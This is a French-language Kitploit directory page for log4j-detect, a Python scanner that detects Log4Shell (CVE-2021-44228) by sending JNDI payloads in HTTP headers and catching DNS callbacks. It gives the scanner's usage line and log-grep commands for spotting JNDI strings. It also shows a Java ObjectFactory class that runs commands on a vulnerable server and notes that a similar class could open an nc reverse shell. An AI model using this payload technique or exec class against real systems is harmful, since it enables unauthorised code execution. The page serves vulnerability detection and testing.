Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j — Scanner Python multithreadé qui détecte Log4Shell (CVE-2021-44228) en envoyant des requêtes HTTP conçues avec des payloads JNDI et en surveillant les rappels DNS pour identifier les hôtes vulnérables. | Kitploit
Outils/GitHubGitHub/hassaanahmad813/log4j
Scanners de VulnérabilitésExploitationCollecte d'InformationsSécurité WebAnalyse DNS
GitHubhassaanahmad813/log4j

log4j

Scanner Python multithreadé qui détecte Log4Shell (CVE-2021-44228) en envoyant des requêtes HTTP conçues avec des payloads JNDI et en surveillant les rappels DNS pour identifier les hôtes vulnérables.

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4j-detect

Script Python 3 simple pour détecter la vulnérabilité de la bibliothèque Java « Log4j » (CVE-2021-44228) pour une liste d'URL avec multithreading

Ce script est basé sur takito1812/log4j-detect

Par ExodataCyberdefense


Le script « log4j-detect.py » développé en Python 3 est chargé de détecter si une liste d'URL est vulnérable à la CVE-2021-44228.

Pour ce faire, il envoie une requête GET en utilisant des threads (meilleures performances) à chacune des URL de la liste spécifiée. La requête GET contient un payload qui, en cas de succès, renvoie une requête DNS à Burp Collaborator / interactsh. Ce payload est envoyé dans un paramètre de test et dans les en-têtes « User-Agent » / « Referer » / « X-Forwarded-For » / « Authentication ». Enfin, si un hôte est vulnérable, un numéro d'identification apparaîtra dans le préfixe du sous-domaine du payload Burp Collaborator / interactsh et dans la sortie du script, permettant de savoir quel hôte a répondu via DNS.

Il convient de noter que ce script ne gère que la détection DNS de la vulnérabilité et ne teste pas l'exécution de commandes à distance.

Exécution de log4j-detect.py

root@kitploit:~
python3 log4j-detect.py -s <burpCollaborator/interactsh...> [-u [urls]] [-f [urlFileList]] [-t THREADS] [-p PROXY] [--urllib3-warnings|--no-urllib3-warnings]

imagen

Si vous avez un accès direct au serveur, vous pouvez exécuter :

root@kitploit:~
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[
s]?|rmi)://[^\n]+'

Pour vérifier si quelqu'un a tenté une connexion via un serveur ldap

Si le script détecte une vulnérabilité

Voici un exemple de code que vous pouvez lancer pour tester si votre serveur peut être compromis (s'il s'agit d'un shell Windows, vous pouvez simplement utiliser la syntaxe PowerShell)

root@kitploit:~
public class ExportObject implements javax.naming.spi.ObjectFactory {
	public ExportObject() {
		try {
			java.lang.getRuntime().exec("touch ~/pwned");
			java.lang.getRuntime().exec("ls ~");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

Quelque chose comme cela pourrait vous permettre d'établir un reverse shell avec la commande nc

Télécharger l’outil